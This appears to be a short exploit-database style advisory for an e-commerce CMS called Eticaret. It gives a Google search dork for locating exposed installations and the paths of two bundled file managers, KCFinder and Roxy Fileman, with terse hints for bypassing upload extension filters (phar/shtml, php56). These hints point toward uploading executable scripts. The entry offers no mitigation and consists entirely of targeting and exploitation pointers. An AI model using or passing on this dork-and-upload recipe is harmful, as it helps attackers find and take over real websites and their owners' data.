Exploit Title: Eticaret Turkey CMS Kcfinder & Roxy File Manager Exploit
Author: L4663r666h05t
Vendor Homepage: https://github.com/iskinucarx/eticaret
Twitter: https://twitter.com/L4663r666h05t
Dork: inurl:/nedmin/production/ (dorking on google images)
Exploit:
(Kcfinder) /nedmin/production/ckeditor/kcfinder/upload.php (bypass phar/shtml)
(Roxy Filemanager) /nedmin/production/fileman/index.html (bypass php56)